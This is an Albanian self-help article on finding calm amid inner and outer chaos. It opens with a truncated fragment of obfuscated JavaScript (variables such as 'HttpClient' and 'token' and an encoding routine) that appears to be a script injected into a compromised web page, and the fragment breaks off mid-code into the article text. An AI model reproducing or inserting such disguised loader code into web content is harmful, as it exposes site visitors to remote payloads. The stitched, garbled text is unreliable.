;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Të gjesh qetësinë në mesin e kaosit shurdhues

By

Në mes të kaosit gjeni qetësi. Pavarësisht se sa e frikshme është e gjithë kjo kur pasiguria dhe paniku mbizotërojnë: vetëm duke qëndruar të përqendruar mund ta kapërcejmë momentin.

Të jetosh në mes të kaosit nuk është kurrë e lehtë dhe situata bëhet e ndërlikuar kur çrregullimi ka të bëjë me nënvetëdijen tonë. Ne e gjejmë veten të pagjumë natën dhe me makthe gjatë ditës. Jeta e përditshme, herë pas here banale, e zakonshme dhe madje e rehatshme, bëhet e pasigurt dhe ne befas bëhemi protagonistë të një skenari apokaliptik.

E vetmja gjë që mbetet për të bërë është të gjejmë qetësinë, vetëm kjo ndjenjë do të mbizotërojë frikën dhe panikun që përhapet në kaosin e brendshëm dhe të jashtëm. Psikiatri Karl Augustus Minneinger shpjegonte sesi mund të zbutet edhe frika më e thellë, por kjo sigurisht që është një detyrë shumë komplekse.

Largimi i çrregullimit emocional dhe të njohjes është i domosdoshëm për të mos u çmendur, për të mos lejuar mbizotërimin e ndjenjave negative derisa ato të bëhen të pakontrollueshme. Para se të arrijmë te kjo, duhet të mbjellim farat e qetësisë në mendjet dhe zemrat tona dhe të presim që ato të mbijnë për të gjetur një strehë të sigurt kur të ndodhë kaosi.

Në jetë, herët a vonë vjen ai moment kur ndjehemi të mbingarkuar nga ajo që jetojmë, nga ajo që ndiejmë dhe kur ndjenja e pafuqisë na vë përfund. Dhe kjo është ajo që tremb më së shumti: vetëdija se nuk ka asgjë që mund të bëjmë për të ndryshuar gjërat.

Zakoni, pra, që të mbajmë gjithmonë gjithçka nën kontroll e që i përket shoqërisë bashkëkohore, na bën të gjendemi të shastisur kur ndodh një ngjarje e papritur në derën tonë dhe e hap atë, pa trokitur. Është në këto momente që qetësia është qëndrimi i vetëm që mund të kemi, në mënyrë që gjithçka të jetë në rregull.

Në kontekstin e pasigurisë, ankthi rritet jashtëzakonisht shumë dhe vetëm duke fituar vetëdijen se ne nuk mund të kontrollojmë gjithçka, do të gjejmë paqe, shkruan bota.al. Sepse çelësi i gjithçkaje nuk është të zgjidhësh një situatë me çdo kusht, por të zgjedhësh si të reagosh ndaj saj. Kur e gjithë kjo të bëhet e qartë për ne, do të gjejmë qetësinë që na nevojitet për të vazhduar të qëndrojmë në ekuilibër, madje edhe në mesin e kaosit më shurdhues.

Artikuj të ngjashëm